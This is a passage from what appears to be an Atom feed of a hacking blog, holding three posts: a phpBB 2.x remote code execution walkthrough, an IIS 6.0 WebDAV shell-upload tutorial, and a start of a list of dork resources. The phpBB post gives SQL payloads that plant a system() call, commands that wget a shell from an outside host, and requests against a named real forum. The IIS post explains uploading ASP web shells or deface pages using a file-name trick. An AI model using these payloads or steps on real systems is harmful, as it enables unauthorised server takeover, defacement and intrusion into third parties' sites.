/&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system('wget http://www.site.com/shell.txt -O shell.php');' WHERE user_id=2;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Unforunately, I get syntax errors because magic quotes won't work. Now there's other methods that come in handy, using $GET requests.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system($_GET[CMD])' WHERE user_id=2;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;CMD=ls -lua&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;There's that stupid WAF...&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;CMD=ls&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: BbbnN.jpg]" border="0" height="173" src="http://i.imgur.com/BbbnN.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now you can download your shell, and pwn that server!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;CMD=wget http://www.site.com/shell.txt&lt;br /&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;CMD=mv shell.txt shell.php&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Then you can re check if your shell is on there.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: #333333; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: dashed; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: dashed; border-top-width: 1px; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;http://passfailstudios.com/messageboard/profile.php?mode=editprofile&amp;amp;CMD=ls&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;&lt;div class="spoiler_header"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoiler_body"&gt;&lt;img alt="[Image: D8Fms.jpg]" border="0" height="172" src="http://i.imgur.com/D8Fms.jpg" style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="320" /&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px;"&gt;Credits&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Couldn't find the actual author of the exploit, but credit goes to whoever published this on milworm.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.exploit-db.com/exploits/1661/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;Exploit-DB&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-5203377303171835808?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/5203377303171835808/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/shelling-phpbb-2xx-remote-code.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5203377303171835808'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5203377303171835808'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/02/shelling-phpbb-2xx-remote-code.html' title='Shelling phpBB ----&gt; 2.x.x Remote Code Execution'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-5386984507371670782</id><published>2012-01-31T05:28:00.002+06:00</published><updated>2012-01-31T05:28:27.615+06:00</updated><title type='text'>[TuT] Exploiting Microsoft/IIS 6.0 WebDAV - Uploading Files</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Today I will be teaching a way to exploit very common a vulnerability and upload your shell and/or deface page to a Microsoft IIS 6.0 based website.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: underline;"&gt;What you will need:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-style: italic; line-height: 18px;"&gt;A windows machine.&lt;br /&gt;Basic knowledge of shells.&lt;br /&gt;A Microsoft/IIS 6.0 website with WebDAV enabled.&lt;br /&gt;An ASP shell. - http://www.[removed].com/?d=YU209ET7 &amp;lt;&amp;lt; Download link for the shell. (Do not even try a PHP shell, it won't work. You can use your ASP shell to upload your PHP shell after though.)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;This is how to perform the exploit in Windows 7:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Click start &amp;gt; Computer.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;You will see this page:&amp;nbsp;&lt;/span&gt;&lt;a href="http://img851.imageshack.us/i/iis1.png/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://img851.imageshack.us/i/iis1.png/&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[/img]&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Next you will want to click "Map network drive", it has been circled in the picture above.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Now a window will pop-up, it should look like this:&amp;nbsp;&lt;/span&gt;&lt;a href="http://img638.imageshack.us/i/iis2.png/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://img638.imageshack.us/i/iis2.png/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;As you can see again. I have circled what needs to be clicked. So click on that then a window will come up asking you to click "Next", do so. After you have clicked the "Next" button, you should see this:&amp;nbsp;&lt;/span&gt;&lt;a href="http://img850.imageshack.us/i/iis3.png/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://img850.imageshack.us/i/iis3.png/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;You will need to highlight/click that folder I circled, then hit the "Next" button once again. It should redirect you to this page:&amp;nbsp;&lt;/span&gt;&lt;a href="http://img21.imageshack.us/i/iis4.png/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://img21.imageshack.us/i/iis4.png/&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;[/img]&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;I put "www.vulnerablesite.com" as an example. You have to type in "http://vulnerablesite.com" otherwise it will not work. It requires HTTP, not WWW. You will receive an error unless you use HTTP (once again,&amp;nbsp;&lt;/span&gt;&lt;a href="http://vulnerablesite.com/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://vulnerablesite.com&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;)&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Hit the "Next" button again, then it should come up with the site name with the output "vulnerablesite.com", you can name it whatever you like, this is what I put:&lt;/span&gt;&lt;a href="http://img130.imageshack.us/i/iis5.png/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://img130.imageshack.us/i/iis5.png/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Except I changed it to "IIS 6.0 Exploit for HF - Phizo".&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;It doesn't matter what you put, just make sure you remember it.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Make sure the box is ticked (open when finished) then go ahead and hit finish.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Okay, we've exploited the website. Now we want to upload our files to the website. A new window has just opened, as you can see, we're connected to the websites files, however we're not aloud to view the files as we're unauthorized. No matter, we can still upload our shells and what other files we would like to upload.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Okay, I don't think I will need to put any pictures in this one, it's that simple. Follow my instructions:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;#1 - Open the directory of where your ASP shell is (example: desktop, documents, or custom folder). Your ASP shell should have a name similar to "shell.asp;anything.jpg".&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;#2 - Drag your ASP shell from your custom folder into the website folder we just exploited. It should just go straight in there with no problems.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;Tada! We have successfully uploaded our shell! Now all we have to do is go to:&amp;nbsp;&lt;/span&gt;&lt;a href="http://vulnerablesite.com/shell.asp;anything.jpg." style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none;" target="_blank"&gt;http://vulnerablesite.com/shell.asp;anything.jpg.&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px;"&gt;I hope this helps.&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-5386984507371670782?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/5386984507371670782/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/tut-exploiting-microsoftiis-60-webdav.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5386984507371670782'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/5386984507371670782'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/tut-exploiting-microsoftiis-60-webdav.html' title='[TuT] Exploiting Microsoft/IIS 6.0 WebDAV - Uploading Files'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-5625356929445428396</id><published>2012-01-31T05:25:00.001+06:00</published><updated>2012-01-31T05:25:11.342+06:00</updated><title type='text'>Dorks, using dorks, finding dorks</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #333333; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;[small tut]Dorks, using dorks, finding dorks.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;For educational purposes only!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="color: orange; font-family: Verdana, Arial, sans-serif; font-size: x-small;"&gt;&lt;span style="line-height: 18px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Usefull sites.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;You could also look for exclusife dorks and original exploits on:&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://www.exploit-db.com/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://www.exploit-db.com/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://1337day.com/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://1337day.com/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://hackingexpose.blogspot.com/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://hackingexpose.blogspot.com/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://sekurity.tumblr.com/" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://sekurity.tumblr.com/&lt;/a&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: orange; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Dork lists on: SQLI, XSS, LFI, RFI, RTE.&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;RANDOM very usefull dorks!&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/sX85tSEY" style="background-color: #333333; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center; text-decoration: none;" target="_blank"&gt;http://pastebin.com/sX85tSEY&lt;/a&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;&amp;lt;- gold worth!&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;SQLI sQl Injection&lt;/span&gt;&lt;br style="background-color: #333333; color: #cccccc; font-family: Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;a href="http://pastebin.com/dzQRHqhu" style="background-color: #333333; color: white; font-family: Verdana, Arial, 